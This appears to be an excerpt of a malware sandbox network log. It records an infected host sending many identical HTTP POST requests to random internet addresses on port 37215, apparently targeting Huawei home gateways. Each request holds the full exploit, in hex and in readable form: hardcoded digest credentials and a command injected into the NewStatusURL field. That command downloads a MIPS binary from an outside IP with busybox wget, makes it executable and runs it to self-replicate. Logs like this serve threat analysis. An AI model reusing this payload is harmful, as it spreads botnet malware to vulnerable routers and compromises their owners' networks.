                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          924192.168.2.155309441.225.195.16337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.712038994 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          925192.168.2.154606075.51.233.6737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.712080956 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          926192.168.2.1535852197.90.51.25137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.712100029 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          927192.168.2.1558426157.90.82.21337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.712203026 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          928192.168.2.15508024.21.15.10737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.712248087 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          929192.168.2.1558332157.80.96.837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.712261915 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          930192.168.2.1558766197.102.57.137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.712903976 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          931192.168.2.154405241.153.5.137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.712963104 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          932192.168.2.1538462157.169.143.24737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.712975979 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          933192.168.2.1539450112.103.219.14237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.713053942 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
